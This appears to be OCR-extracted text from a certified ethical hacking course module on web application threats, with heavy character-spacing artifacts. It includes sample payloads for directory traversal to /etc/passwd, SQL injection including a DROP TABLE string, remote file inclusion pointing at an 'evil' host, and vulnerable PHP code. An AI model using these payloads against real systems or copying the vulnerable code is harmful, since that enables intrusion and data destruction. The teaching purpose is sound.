U n v a l i d a t e d I n p u t
In order to bypass the security system, attackers tam per w ith the h ttp requests, URL,
headers, form fields, hidden fields, query strings etc. Users' login IDs and oth e r related
Module 13 Page 1750

Exam 312-50 C ertified Ethical HackerEthical Hacking and Counterm easures
data gets stored in the cookies and this becomes a source o f attack fo r the intruders. Attackers
gain access to the victim 's system using the inform ation present in cookies. Examples o f attacks
caused by unvalidated input include SQL injection, cross-site scripting (XSS), buffer overflow s,
etc.
C r o s s - s i t e S c r i p t i n g (X S S )
" i T f An attacker bypasses the clients ID security m echanism and gains access privileges, and
then injects m alicious scripts into the web pages o f a particular website. These m alicious scripts
can even rew rite the HTML content o f the website.
I n j e c t i o n F la w s
Injection flaws are w eb application vulnerabilities th a t allow untrusted data to be
interpreted and executed as part o f a com m and or query.
S Q L I n j e c t i o n
This is a type o f attack w here SQL com m ands are injected by the attacker via input
data; then the attacker can tam per w ith the data.
P a r a m e t e r / F o r m T a m p e r i n g
a This type o f tam pering attack is intended to m anipulating the param eters exchanged
betw een client and server in order to m o d ify application data, such as user credentials
and permissions, price and qua n tity o f products, etc. This inform ation is actually stored in
cookies, hidden form fields, or URL Query Strings, and is used to increase application
fu n ctio n a lity and control. Man in the m iddle is one o f the examples fo r this type o f attack.
Attackers use tools like W eb scarab and Paros proxy fo r these attacks.
D e n i a l - o f - S e r v i c e ( D o S )
M | | M ' '
t__ i__ A denial-of-service attack is an attacking m ethod intended to te rm in a te the
operations o f a w ebsite or a server and make it unavailable to intended users. For
instance, a w ebsite related to a bank or em ail service is not able to function fo r a few hours to a
few days. This results in loss o f tim e and money.
B r o k e n A c c e s s C o n t r o l
Broken access control is a m ethod used by attackers w here a particular fla w has been
identified related to the access control, w here a u th e n tica tio n is bypassed and the
attacker com prom ises the netw ork.
VA /// C r o s s - s i t e R e q u e s t F o r g e r y
The cross-site request forgery m ethod is a kind o f attack w here an authenticated user
in m ade to perform certain tasks on the w eb application th a t an attackers chooses. For
exam ple, a user clicking on a particular link sent through an em ail or chat.
I n f o r m a t i o n L e a k a g e
Inform ation leakage can cause great losses fo r a com pany. Hence, all sources such as
Module 13 Page 1751 Ethical Hacking and Countermeasures C opyright © by EC-C0UnCil
All Rights Reserved. R eproduction is S trictly Prohibited.

Exam 312-50 C ertified Ethical HackerEthical Hacking and Counterm easures
systems or oth e r netw ork resources m ust be protected from inform ation leakage by em ploying
proper content filte rin g m echanism s.
I m p r o p e r E r r o r H a n d l i n g
It is necessary to define how the system or netw ork should behave when an error
occurs. O therw ise, it may provide a chance fo r the attacker to break into the system.
Im proper e rro r handling may lead to DoS attacks.
L o g T a m p e r i n g
Logs are m aintained by w eb applications to track usage patterns such as user login
credentials, adm in login credentials, etc. Attackers usually inject, delete, or tam per
w ith w eb application logs so th a t they can perform m alicious actions or hide th e ir identities.
B u f f e r O v e r f l o w
A w eb application's b uffer overflow vulnerability occurs when it fails to guard its
buffer properly and allows w ritin g beyond its m axim um size.
B r o k e n S e s s io n M a n a g e m e n t
W hen security-sensitive credentials such as passwords and oth e r useful m aterial are
not properly taken care, these types o f attacks occur. Attackers com prom ise the
credentials through these security vulnerabilities.
S e c u r i t y M i s c o n f i g u r a t i o n
Developers and netw ork adm inistrators should check th a t the entire stack is
configured properly or security m isconfiguration can happen at any level o f an
application stack, including the platform , w eb server, application server, fram ew ork, and
custom code. Missing patches, m isconfigurations, use o f default accounts, etc. can be detected
w ith the help o f autom ated scanners th a t attackers exploit to com prom ise w eb application
security.
B r o k e n A c c o u n t M a n a g e m e n t
---------- Even authentication schemes th a t are valid are weakened because o f vulnerable
account m anagem ent functions including account update, fo rg o tte n or lost password recovery
or reset, password changes, and oth e r sim ilar functions.
I n s e c u r e S t o r a g e
W eb applications need to store sensitive inform ation such as passwords, credit card
num bers, account records, or oth e r authentication inform ation som ew here; possibly
in a database or on a file system. If proper security is not m aintained fo r these storage
locations, then the w eb application may be at risk as attackers can access the storage and
misuse the inform ation stored. Insecure storage o f keys, certificates, and passwords allow the
attacker to gain access to the w eb application as a le g itim a te user.
Module 13 Page 1752 Ethical Hacking and Countermeasures C opyright © by EC-C0UnCil
All Rights Reserved. R eproduction is S trictly Prohibited.

W e b A p p l i c a t i o n T h r e a t s ■ 2 C E H
Failure to
R e s tric t URL
Access
‫׳‬V
S e c u rity
M a n a g e m e n t
E x p lo its
&
v 1‫־‬
In s u ffic ie n t
T ra n s p o rt L aye r
P ro te c tio n
O b fu s c a tio n
A p p lic a tio n
D M Z
P ro to c o l A tta c k s
U n v a lid a te d
R e d ire c ts a nd
F o rw a rd s
M a lic io u s
File E xe cu tio n
Session
F ix a tio n A tta c k
P la tfo rm
E xp lo its
In se cu re
D ire c t O b je c t
R e fe re n ce s
In se cu re
C ry p to g ra p h ic
S to ra g e
A u th e n tic a tio n W e b S ervices
H ija ckin g A tta c k s
W e b A p p l i c a t i o n T h r e a t s 2 ‫־‬
P l a t f o r m E x p l o i t s
Various w eb applications are built on by using d iffe re n t platform s such as BEA W eb logic and
ColdFusion. Each platform has various vulnerabilities and exploits associated w ith it.
in I n s e c u r e D i r e c t O b j e c t R e f e r e n c e s
§ W hen various in te rn a l im p le m e n ta tio n objects such as file, directory, database
record, or key are exposed through a reference by a developer, then the insecure direct object
reference takes place.
For exam ple, w here a bank account num ber is made a prim ary key, then there is a good change
it can be com prom ised by the attacker based on such references.
I n s e c u r e C r y p t o g r a p h i c S t o r a g e
W hen sensitive data has been stored in the database, it has to be properly encrypted
using cryptography. A few cryptographic encryption m ethods developed by developers are not
up to par. Cryptographically very strong encryption m ethods have to be used. At the same tim e,
care m ust be taken to store the cryptographic keys. If these keys are stored in insecure places,
then the attacker can obtain them easily and decrypt the sensitive data.
Module 13 Page 1753

A u t h e n t i c a t i o n H i j a c k i n g
In order to identify the user, every w eb application uses user identificatio n such as a
user ID and password. Once the attacker com prom ises the system, various m alicious
things like th e ft o f services, session hijacking, and user im personation can occur.
N e t w o r k A c c e s s A t t a c k s
fill 11=
N etw ork access attacks can m ajorly im pact w eb applications. These can have an effect
on basic level o f services w ith in an application and can allow access th a t standard HTTP
application m ethods w ould not have access to.
C o o k i e S n o o p in g
= Attackers use cookie snooping on a victim 's system to analyze th e ir surfing habits and
sell th a t inform ation to oth e r attackers or may use this inform ation to launch various
attacks on the victim 's w eb applications.
W e b S e r v ic e s A t t a c k s
W eb services are process-to-process com m unications th a t have special security issues
and needs. An attacker injects a m alicious script into a w eb service and is able to
disclose and m odify application data.
- ^ I n s u f f i c i e n t T r a n s p o r t L a y e r P r o t e c t i o n
SSL/TLS authentications should be used fo r authentication on w ebsites or the attacker
can m o n ito r netw ork tra ffic to steal an authenticated user's session cookie.
Various threats such as account th e ft, phishing attacks, and adm in accounts may happen after
systems are being com prom ised.
r ‫״‬ H i d d e n M a n i p u l a t i o n
I
These types o f attacks are m ostly used by attackers to com prom ise e-com m erce
websites. Attackers m anipulate the hidden fields and change the data stored in them . Several
online stores face this type o f problem every day. Attackers can alter prices and conclude
transactions w ith the prices o f th e ir choice.
D M Z P r o t o c o l A t t a c k s
The DMZ (D em ilitarized Zone) is a sem i-trusted netw ork zone th a t separates the
untrusted Internet from the com pany's trusted internal netw ork. An attacker w ho is able to
com prom ise a system th a t allows other DMZ protocols has access to oth e r DMZs and internal
systems. This level o f access can lead to:
© Com prom ise o f the w eb application and data
Q D efacem ent o f websites
© Access to internal systems, including databases, backups, and source code
Module 13 Page 1754

U n v a l i d a t e d R e d i r e c t s a n d F o r w a r d s
_____ Attackers make a victim click an unvalidated link th a t appears to be a valid site. Such
redirects may a tte m p t to install m alw are or tric k victim s into disclosing passwords or
oth e r sensitive inform ation. Unsafe forw ards may allow access control bypass leading to:
0 Session fixation attacks
© Security m anagem ent exploits
0 Failure to restrict URL access
e M alicious file execution
F a i l u r e t o R e s t r i c t U R L A c c e s s
An app ication often safeguards or protects sensitive fu n ctio n a lity and prevents the
displays o f links or URLs fo r protection. Attackers access those links or URLs directly
and perform illegitim ate operations.
O b f u s c a t i o n A p p l i c a t i o n
Attackers usually w ork hard at hiding th e ir attacks and to avoid detection. N etw ork
and host intrusion detection systems (IDSs) are constantly looking fo r signs o f w ell-
know n attacks, driving attackers to seek d iffe re n t ways to rem ain undetected. The m ost
com m on m ethod o f attack obfuscation involves encoding portions o f the attack w ith Unicode,
UTF-8, or URL encoding. Unicode is a m ethod o f representing letters, num bers, and special
characters so these characters can be displayed properly, regardless o f the application or
underlying platform in which they are used.
S e c u r i t y M a n a g e m e n t E x p l o i t s
Some attackers target security m anagem ent systems, either on netw orks or on the
application layer, in order to m odify or disable security enforcem ent. An attacker w ho
exploits security m anagem ent can directly m odify p ro te ctio n policies, delete existing policies,
add new policies, and m odify applications, system data, and resources.
__ L * S e s s io n F i x a t i o n A t t a c k
______ In a session fixation attack, the attacker tricks or attracts the user to access a
legitim ate w eb server using an explicit session ID value.
M a l i c i o u s F i l e E x e c u t i o n
___ M alicious file execution vulnerabilities had been found on m ost applications. The
cause o f this vulnerability is because o f unchecked input into the w eb server. Due to
this unchecked input, the files of attackers are easily executed and processed on the web
server. In addition, the attacker perform s rem ote code execution, installs the ro o tk it rem otely,
and in at least some cases, takes com plete control over the systems.
Module 13 Page 1755

C E HU n v a l i d a t e d I n p u t
An attacker exploits inp u t validation flaw s to
p erform cross-site scripting, b uffe r overflow ,
injection attacks, etc. th a t result in data
th e ft and system m a lfun ctio n in g
D a ta b a s e
• B row ser input not
• validated by the w eb
: application
s t r in g s q l — ,,s e l e c t * from U sers
where
u se r = ‫י‬ " + U se r. T ex t + ‫י‬‫יי‬
and pwd= ‫״‬‫י‬ + P assw o rd .T ex t + ‫״‬ !« r
In p u t validation flaw s refers to a w eb application
vulnerability w here in p u t fro m a clie n t is not
valid a te d before being processed by w eb
applications and backend servers
Boy.com
h t t p : / / j u g g y b o y . c o m / l o g i n . a s p x
? u s e r = j a s o n s 0 p a s s = s p r x n g f i e ld
M o d ifie d Q ueryB row ser Post Request
U n v a l i d a t e d I n p u t
An input va lid a tio n fla w refers to a w eb application vulnerability w here input from a
client is not validated before being processed by w eb applications and backend servers. Sites
try to protect them selves from m alicious attacks through input filtra tio n , but there are various
m ethods prevailing fo r the the purpose o f encoding. M any h ttp inputs have m ultiple form ats
th a t make filte rin g very d ifficu lt. The canonicalization m ethod is used to sim plify the encodings
and is useful in avoiding various vulnerable attacks. W eb applications use only a client-side
m echanism in input validation and attackers can easily bypass it. In order to bypass the security
system, attackers tam per the h ttp requests, URLs, headers, form fields, hidden fields, and query
strings. Users‫׳‬ login IDs and oth e r related data gets stored in the cookies and this becomes a
source o f attack fo r intruders. Attackers gain access to the systems by using the inform ation
present in the cookies. Various m ethods used by hackers are SQL injection, cross-site scripting
(XSS), b uffer overflow s, fo rm a t string attacks, SQL injection, cookie poisoning, and hidden field
m anipulation th a t result in data th e ft and system m alfunctioning.
Module 13 Page 1756

h t t p : / / ju g g y b o y . c o m / l o g i n . a s p x
? u s e r = ja s o n s @ p a s s = s p r in g f ie ld
D a ta b a s e
: Brow ser input not
: validated by th e w eb
: application
s t r in g s q l — ,,s e l e c t * from U sers
Wtmmrnmr* w here
u s e r = ' ” + U se r .T e x t + ‫״‬ '
and pwd=1‫״‬ + P a ssw o r d .T e x t + " '"r
M o d ifie d Q ueryB ro w se r Post R equest
F ig u re 1 3 .5 : U n v a lid a te d In p u t
Module 13 Page 1757

‫ו‬
C E H
Urtifwd tlfcxjl lUthM
J A w eb param eter tam pering attack involves the m anip u la tio n o f param eters exchanged between ______ . - - .
client and server in o rder to m odify application data such as user credentials and perm issions,
price, and q uantity o f products
J A param eter tam pering attack e xplo its vu ln e ra b ilitie s in integrity and logic validation mechanisms
th a t may result in XSS, SQL injection, etc.
C o p yrig h t © by E&Coinal. A ll R ights R eserved. R ep ro d u ctio n is S trictly Pro h ibited .
r-• ■‫ייי‬‫ח‬
Param eter tam pering is a sim ple form o f attack aim ed directly at the application's
business logic. This attack takes advantage o f the fact th a t m any program m ers rely on hidden
or fixed fields (such as a hidden tag in a form or a param eter in an URL) as the only security
measure fo r certain operations. To bypass this security m echanism , an attacker can change
these param eters.
D etailed D escription
Serving the requested files is the m ain function o f w eb servers. During a w eb session,
param eters are exchanged betw een the w eb brow ser and the w eb application in order
to m aintain inform ation about the client's session, which elim inates the need to m aintain a
com plex database on the server side. URL queries, form fields, and cookies are used to pass the
param eters.
Changed param eters in the form field are the best exam ple o f param eter tam p e rin g . W hen a
user selects an HTML page, it is stored as a form field value, and transferred as an HTTP page to
the web application. These values may be pre-selected (com bo box, check box, radio buttons,
etc.), free text, or hidden. An attacker can m anipulate these values. In some extrem e cases, it is
just like saving the page, editing the HTML, and reloading the page in the w eb browser.
0 (D ® 1
| http://www.juggybank.com/cust.asp?profile=21&debit=2500< ........J■• T a m p erin g w ith th e |
URL p a ra m e te rs 1
0 @ ® 1
| http://www.juggybank.com/cust.asp?profile=82&debtt=lSOO< ........J•■1...... .........
| http://www.juggybank.com/stat.asp?pg=531&status=view < .........
O th e r p a ra m e te rs can
be ch an g e d in c lu d in g
a ttrib u te p a ra m e te rs
0 © ®
| http://www.juggybank.com/stat.asp?pg-147&status‫־‬ delete < ••••
Module 13 Page 1758

Hidden fields th a t are invisible to the end user provide inform ation status to the web
application. For exam ple, consider a product order form th a t includes the hidden field as
follow s:
< in p u t ty p e = "h id d e n " n a m e = "p ric e " v a lu e = "9 9 . 90">
Combo boxes, check boxes, and radio buttons are examples o f pre-selected param eters used to
transfer inform ation betw een d iffe re n t pages, w hile allow ing the user to select one o f several
predefined values. In a param eter tam pering attack, an attacker may m anipulate these values.
For exam ple, consider a form th a t includes the com bo box as follow s:
<FORM METHOD=POST AC TIO N ="xferM oney. a sp ‫״‬ >
Source A c c o u n t: <SELECT NAME="SrcAcc">
<OPTION VALUE=" 1 2 3 4 5 6 7 8 9 "> ******7 8 9</OPTION>
<OPTION V A LU E ="868686868">******868</O P TIO N X /S E LE C T>
<BR>Amount: <INPUT NAME="Amount" SIZE=20>
< B R > D e s tin a tio n A c c o u n t: <INPUT NAME="DestAcc" SIZE=40>
<BRXINPUT TYPE=SUBMIT> <INPUT TYPE=RESET>
</FORM>
Bypassing
An attacker may bypass the need to choose betw een tw o accounts by adding another account
into the HTML page source code. The new com bo box is displayed in the w eb brow ser and the
attacker can choose the new account.
HTML form s subm it th e ir results using one o f tw o m ethods: GET or POST. In the GET m ethod,
all form param eters and th e ir values appear in the query string o f the next URL, which the user
sees. An attacker may tam per w ith this query string. For exam ple, consider a w eb page th a t
allows an authenticated user to select one o f his or her accounts from a com bo box and debit
the account w ith a fixed unit am ount. W hen the subm it button is pressed in the w eb browser,
the URL is requested as follow s:
http://w w w .iuggvbank.com /cust.asp?profile=21& debit=2500
An attacker may change the URL param eters (profile and debit) in order to debit another
account:
http://w w w .iuggybank.com /cust.asp?profile=82& debit=1500
There are other URL param eters th a t an attacker can m odify, including a ttrib u te param eters
and internal m odules. A ttrib u te param eters are unique param eters th a t characterize the
behavior o f the uploading page. For exam ple, consider a content-sharing w eb application th a t
enables the content creator to m odify content, w hile oth e r users can only view the content.
The w eb server checks w heth e r the user w ho is accessing an entry is the author or not (usually
by cookie). An ordinary user w ill request the follow ing link:
http://w w w .iuggybank.com /stat.asp?pg=531& status=view
Module 13 Page 1759

An attacker can m odify the status param eter to ‫״‬delete‫״‬ in order to delete perm ission fo r the
content.
http://w w w .iuggybank.com /stat.asp?pg=147& status=delete
P aram eter/form tam pering can lead to th e ft o f services, escalation o f access, session hijacking,
and assuming the id e n tity o f other users as well as param eters allow ing access to developer
and debugging inform ation.
T a m p e rin g w ith th e U RL
p a ra m e te rs
O th e r p a ra m e te rs ca n b e
c h a n g e d in c lu d in g a ttr ib u te
p a ra m e te rs
http://www.juggybank.com/cust.asp?profile=21&debit=2500
[GO
‫ר‬http://www.juggybank.com/cust.asp?profile=82&debit=1500
h ttp ://w w w .juggybank.com /stat. asp?pg=531&status=view <£
| GO
‫ך‬http://w w w .ju ggyban k.com /stat.a sp?pg=1 47& status=delete
|QO
FIGURE 13.6: Form Tampering
Module 13 Page 1760

D i r e c t o r y T r a v e r s a l C E H
C«rt1fW4 itkiul Nm Im
v D i r e c t o r y T r a v e r s a l
___ W hen access is provided outside a defined application, there exists the possibility o f
unintended inform ation disclosure or m odification. Com plex applications exist as application
com ponents and data, which are typically configured in m ultiple directories. An application has
the ability to traverse these m ultiple directories to locate and execute the legitim ate portions o f
an application. A directory traversal/forceful browsing attack occurs when the attacker is able
to browse fo r directories and files outside the norm al application access. A D irectory
Traversal/Forceful Browsing attack exposes the d ire cto ry structure o f an application, and often
the underlying w eb server and operating system. W ith this level o f access to the web
application architecture, an attacker can:
© Enum erate the contents of files and directories
© Access pages th a t otherw ise require authentication (and possibly paym ent)
© Gain secret know ledge o f the application and its construction
© Discover user IDs and passwords buried in hidden files
© Locate source code and other interesting files left on the server
© View sensitive data, such as custom er inform ation
Module 13 Page 1761

The follow ing exam ple uses to backup several directories and obtain a file containing a
backup o f the web application:
h ttp ://w w w .ta rg e tsite .co m /../../../site b a cku p .zip
This exam ple obtains the "/e tc/p a ssw d " file from a UNIX/Linux system, which contains user
account inform ation:
h ttp ://w w w .ta rg e ts ite .c o m /../../../../e tc /p a s s w d
Let us consider another example where an attacker tries to access files located outside the web
publishing directory using directory traversal:
http://w w w .iuggybov.com /process.aspx=.J . / s o m e dir/som e file
h ttp ://w w w .iu g g yb o y.co m /../■ ./../../so m e dir/som e file
The pictorial representation o f directory traversal attack is shown as follow s:
s
<?php
$theme — 'Jaoon.php',
J 1 ‫יי‬’‫™־״־‬‫״‬—’‫׳‬*‫׳־‬ ) )
> □c
/../../••/etc/passwd
password files
A tta c k e r
V u ln e ra b le S e rv e r C o d e
ro o t:a 9 8 b 2 4 a Id 3 e 8 :0 : l:S y s te m O p e ra t o r:/:/b in /k sh
d a e m o n : * : l: l: :/ tm p :
J a s o n :a 3 b 6 9 8 a 7 6 f7 6 d 5 7 .:1 8 2 :1 0 0 :D e v e lo p e r:/h o m e /u s e rs /J a s o n / :/ b in / c s h
FIGURE 1 3 .7 : D ire c to ry T ra v e rs a l
Module 13 Page 1762

S e c u r i t y M i s c o n f i g u r a t i o n C E H
Easy Exploitation
Using misconfiguration vulnerabilities, attackers gain
unauthorized accesses to default accounts, read
unused pages, exploit unpatched flaws, and read or
w rite unprotected files and directories, etc.
Common Prevalence
Security misconfiguration can occur at any level
o f an application stack, including the platform,
web server, application server, fram ework, and
custom code
Example
e The application server admin console is automatically
installed and not removed
Default accounts are not changed
Attacker discovers the standard admin pages on server,
logs in with default passwords, and takes over
M S e c u r i t y M i s c o n f i g u r a t i o n
' ____ " Developers and netw ork a d m in istra to rs should check th a t the entire stack is
configured properly or security m isconfiguration can happen at any level o f an application
stack, including the platform , w eb server, application server, fram ew ork, and custom code. For
instance, if the server is not configured properly, then it results in various problem s th a t can
infect the security o f a website. The problem s th a t lead to such instances include server
softw are flaws, unpatched security flaws, enabling unnecessary services, and im proper
authentication. A few o f these problem s can be detected easily w ith the help o f autom ated
scanners. Attackers can access default accounts, unused pages, unpatched flaws, unprotected
files and directories, etc. to gain unauthorized access. All the unnecessary and unsafe features
have to be taken care o f and it proves very beneficial if they are com pletely disabled so th a t the
outsiders d o n 't make use o f them fo r m alicious attacks. All the application-based files have to
be taken care o f through proper authentication and strong security m ethods or crucial
inform ation can be leaked to the attackers.
Examples o f unnecessary features th a t should be disable or changed include:
Q The application server adm in console is autom atically installed and not rem oved
© D efault accounts are not changed
Module 13 Page 1763

6 A ttacker discovers the standard adm in pages on server, logs in w ith default passwords,
and takes over
Ethical Hacking and Countermeasures Exam312-50 Certified Ethical Hacker
Module 13 Page 1764

I n j e c t i o n F l a w s C E H
Injection flaws are web application vulnerabilities that allow untrusted data to be interpreted and executed
as part o f a command or query
Attackers exploit injection flaws by constructing malicious comm ands or queries that result in data loss or
corruption, lack o f accountability, or denial o f access
Injection flaws are prevalent in legacy code, often found in SQL, LDAP, and XPath queries, etc. and can be
easily discovered by application vulnerability scanners and fuzzers
LDAP InjectionCommand InjectionSQL Injection
It involves the injection
of malicious LDAP
statements
o f malicious code through
a web application
o f malicious SQL queries
into user input form s
SQL
Server
JJ
—
I n j e c t i o n F l a w s
Injection flaws are the loopholes in the w eb application th a t allow unreliable data to
be interpreted and executed as part of a com m and or query. The injection flaws are being
exploited by the attacker by constructing m alicious com m ands or queries th a t result in loss of
data or corruption, lack o f accountability, or denial o f access. Injection flaws are prevalent in
legacy code, often found in SQL, LDAP, and XPath queries, etc. These flaws can be detected
easily by application vulnerability scanners and fuzzers. By exploiting the flaw s in the web
application, the attacker can easily read, w rite , delete, and update any data, i.e., relevant or
irrelevant to th a t particular application. They are m any types o f injection flaws; some o f them
are as follow s:
S Q L i n j e c t i o n
SQL injection is the m ost com m on w ebsite vulnerability on the Internet. It is the
technique used to take advantage o f non-validated input vulnerabilities to pass SQL com m ands
through a w eb application fo r execution by a backend database. In this, the attacker injects the
m alicious SQL queries into the user input form and this is usually perform ed to either to gain
unauthorized access to a database or to retrieve inform ation directly from the database.
* C o m m a n d i n j e c t i o n
The flaws in com m and injection are another type o f w eb application vulnerability.
Module 13 Page 1765

These flaws are highly dangerous. In this type o f attack, the attacker injects the m alicious code
via a w eb application.
L A D P i n j e c t i o n
‫־‬ LDAP injection is an attack m ethod in which the w ebsite th a t constructs the LDAP
statem ents from user-supplied input are exploited fo r launching attacks. W hen an application
fails to sanitize the user input, then the LDAP statem ent can be m odified w ith the help o f local
proxy. This in tu rn results in the execution o f a rb itra ry com m ands such as granting access to
unauthorized queries and altering the content inside the LDAP tree.
Module 13 Page 1766

C E HS Q L I n j e c t i o n A t t a c k s
J SQL injection attacks use a series o f m alicious SQL queries to directly
m anipulate the database
J An attacker can use a vulnerable w eb application to bypass norm al se curity
m easures and obtain direct access to the valuable data
J SQL injection attacks can often be executed fro m the address bar, fro m
w ithin application fields, and through queries and searches
SQL injection
attacks
01 < ? p h p
02 f u n c t i o n s a v e e m a il ( $ u s e r , $ m e s s a g e )
03 {
04 $ s q l = "IN S E R T IN TO M e s s a g e s (
05 u s e r , m e s s a g e
06 ) VALUES (
07 ' $ u s e r 1 , ' $ m e s s a g e '
08 )
09 r e t u r n m y s q l_ q u e r y ( $ s q l) ;
10 }
11 ?>
In te rn e tW eb ■‫נ‬.......................
B row ser
t e s t') ;D R O P TABLE M e s s a g e s ;- -
When this code is sent to the database
server, it drops the Messages table
Code to insert spam m y data on behalf of o th e r users SC*L Injection vulnerable server code
t e s t ' ) , ( ' u s e r 2 ' , '1 am J a s o n ') , ( ' u s e r 3 ' , 'Y o u a r e h a c k e dA ttacker
N ote: For com plete coverage o f SQL Injection concepts and techniques, refer to M odule 14: SQL Injection
S Q L I n j e c t i o n A t t a c k s
SQL injection attacks use com m and sequences from S tructured Q uery Language (SQL)
statem ents to control database data directly. A pplications often use SQL statem ents to
authenticate users to the application, validate roles and access levels, store and obtain
inform ation fo r the application and user, and link to o th e r data sources. Using SQL injection
m ethods, an attacker can use a vulnerable w eb application to avoid norm al security measures
and obtain direct access to valuable data.
The reason w hy SQL injection attacks w ork is th a t the application does not properly validate
input before passing it to a SQL statem ent. For exam ple, the follow ing SQL statem ent,
s e le c t * from tablenam e where User1D= 2302 becom es the follow ing w ith a sim ple SQL
injection attack:
SELECT * FROM tablenam e WHERE U serID = 2302 OR 1=1
The expression "OR 1=1" evaluates to the value "TRUE," often allow ing the enum eration o f all
user ID values from the database. SQL injection attacks can often be entered fro m the address
bar, from w ith in application fields, and through queries and searches. SQL injection attacks can
allow an attacker to:
© Log in to the application w ith o u t supplying valid credentials
Module 13 Page 1767

© Perform queries against data in the database, often even data to which the application
w ould not norm ally have access
© M odify the database contents, or drop the database altogether
© Use the tru st relationships established betw een the web application com ponents to
access oth e r databases
01 < ? p h p
02 f u n c t i o n s a v e e m a il ( ? u s e r , ? m e s s a g e )
03 <
04 $ s q l = "IN S E R T IN T O M e s s a g e s (
05 u s e r , m e s s a g e
06 ) VALUES (
07 ' ? u s e r ' , '? m e s s a g e '
08 ) " ;
09 r e t u r n m y s q l q u e r y ( $ s q l ) ;
10 }
11 ?>
SQL Injection vulnerable server code
'Y o u a r e h a c k e d
Internet
m i
W e b
B ro w se r
A
t e s t ') ; D R O P TA BLE M e s s a g e s ;—
W hen this code is sent to the database
server, it drops the Messages table
Code to insert spammy data on behalf of other users
t e s t ' ) , ( ' u s e r 2 ' , '1 am J a s o n ') , C u s e r 3 '
FIGURE 1 3 .8 : SQL In je c tio n A tta c k s
Module 13 Page 1768

-
C o m m a n d I n j e c t i o n A t t a c k s C E H
J An a tta c k e r trie s to c ra ft an in p u t s trin g to g a in shell access to a w e b se rver
J Shell In je c tio n fu n c tio n s in c lu d e s y s t e m ( ) , s t a r t P r o c e s s ( ) ,
ja v a . l a n g . R u n tim e . e x e c ( ) ,S y s te m . D ia g n o s t ic s . P ro c e s s . S t a r t ( ) ,
a nd s im ila r APIs
This ty p e o f a tta c k is used to d e fa c e w e b s ite s v irtu a lly . U sing th is a tta c k , an
a tta c k e r add s an e x tra H T M L -ba se d c o n te n t to th e v u ln e ra b le w e b a p p lic a tio n
In H TM L e m b e d d in g a tta cks, u ser in p u t to a w e b s c rip t is pla ce d in to th e o u tp u t
H TM L, w ith o u t b e in g checked fo r H TM L co d e o r s c rip tin g
J
J The a tta c k e r e x p lo its th is v u ln e ra b ility a nd in je c ts m a lic io u s co de in to syste m
file s
J h t t p : / /w w w . ju g g y b o y . c o m / v u ln e r a b le . p h p ? C O L O R = h ttp : / / e v i l / e x p l o i t ?
C o m m a n d I n j e c t i o n A t t a c k s
— — Com mand injection flaws allow attackers to pass m alicious code to d iffe re n t systems
via a w eb application. The attacks include calls to the operating system over system calls, use of
external program s over shell com m ands, and calls to the backend databases over SQL. Scripts
th a t are w ritte n in Perl, Python, and oth e r languages execute and insert the poorly designed
w eb applications. If a w eb application uses any type o f inte rp re te r, attacks are inserted to inflict
damage.
To perform functions, web applications m ust use operating system features and external
program s. Although m any program s invoke externally, the fre q u e n tly used program is
Sendmail. W hen a piece o f inform ation is passed through the HTTP external request, it m ust be
carefully scrubbed, or the attacker can insert special characters, m alicious com m ands, and
com m and m odifiers into the inform ation. The w eb application then blindly passes these
characters to the external system fo r execution. Inserting SQL is dangerous and rather
w idespread, as it is in the form o f com m and injection. Command injection attacks are easy to
carry out and discover, but they are tough to understand.
^ = = 3 S h e ll I n j e c t i o n
1 To com plete various functionalities, w eb applications use various applications and
program s. It is ju st like sending an em ail by using the UNIXsendmail program . There is
a chance th a t an attacker may inject code into these program s. This kind o f attack is dangerous
Module 13 Page 1769

especially to w eb page security. These injections allow intruders to perform various types of
m alicious attacks against the user's server. An attacker tries to craft an input string to gain shell
access to a w eb server.
Shell injection functions include system (), Start Process (), java.lang.Runtim e.exec (),
System.Diagnostics.Process.Start (), and sim ilar APIs.
H T M L E m b e d d i n g
This type o f attack is used to deface w ebsites virtually. Using this attack, an attacker
adds extra HTML-based content to the vulnerable web application. In HTML
em bedding attacks, user input to a w eb script is placed into the o u tp u t HTML, w ith o u t being
checked fo r HTML code or scripting.
F i l e I n j e c t i o n
a The attacker exploits this vulnerability and injects m alicious code into system files:
http://w w w .iugg vbov.com /vulnerable.p hp?C O LO R = http://evil/e xploit
Users are allow ed to upload various files on the server through various applications and those
files can be accessed through the Internet from any part o f the w orld. If the application ends
w ith a php extensionand if any user requests it, then the application interprets it as a php script
and executes it. This allows an attacker to perform arbitrary com m ands.
Module 13 Page 1770

C o m m a n d I n j e c t i o n E x a m p l e
http://juggyboy/cgi‫־‬ bin/lspro/lspro.cgi?hit_out=1036
c o m^ J u g g y B o y
CUser Name Addison
‫נ‬
‫כ‬
Email Address a d d i@ juggyboy.co~
Site URL ^ www.juggyboy.com
Banner URL [ ■gif ||newpassword|1036|60|468
Password [ newpassword
Poor input validation at server
script was exploited in this attack
that uses database INSERT and
UPDATE record command
Attacker Launching Code
Injection Attack
M alicious code:
w w w . ju g g y b o y . c a m /b a im e r . g ifl|n e w p a s s w o r d ||1 0 3 6
|6 0 |4 6 8
S An attacker enters m alicious code (account
num ber) w ith a new password
6 The last tw o sets o f num bers are the banner
size
« Once th e attacker clicks the subm it b u tto n , the
passw ord fo r the account 1036 is changed to
"ne w pa ssw o rd"
9 The server script assumes th a t only the URL o f
th e banner image file is inserted into th a t field
C o m m a n d I n j e c t i o n E x a m p l e
The follow ing is an exam ple o f com m and injection:
To perform a com m and injection attack, the attacker first enters m alicious code (account
num ber) w ith a new password. The last tw o sets o f num bers are the banner size. Once the
attacker clicks the subm it button, the password fo r the account 1036 is changed to
"new passw ord." The server script assumes th a t only the URL o f the banner image file is
inserted into th a t field.
Module 13 Page 1771

©
M [•..................... > I f http//juggYtx>y/cgibin/lspr0/lspf0cgi?ht1 out 1036
.com
A ttacker Launching Code
Injection A ttack
M alicious code:
U M f N«m« Addison
‫כ‬
‫כ‬
Email Addreu ^ addigojuggytooycom
Sit• U R I [ wwwiuggyboycom
1nn#f URL [ .g if) |newpjssword|1036|fc0|468 ]
Password [ ncwpjsswofd ] !
w w w .^u g g y b o y .c o m /b a n n e r.g ifl|n e w p a s s w o rd l|1 0 3 6
1601468
P o o r in p u t v a lid a tio n a t se rver
scrip t w a s e x p lo ite d in th is a tta ck
th a t u se s d a ta b a se INSERT an d
U PD A TE re co rd co m m a n d
FIGURE 1 3 .9 : C o m m a n d In je c tio n E xa m p le
Module 13 Page 1772

C E HF i l e I n j e c t i o n A t t a c k
<?php
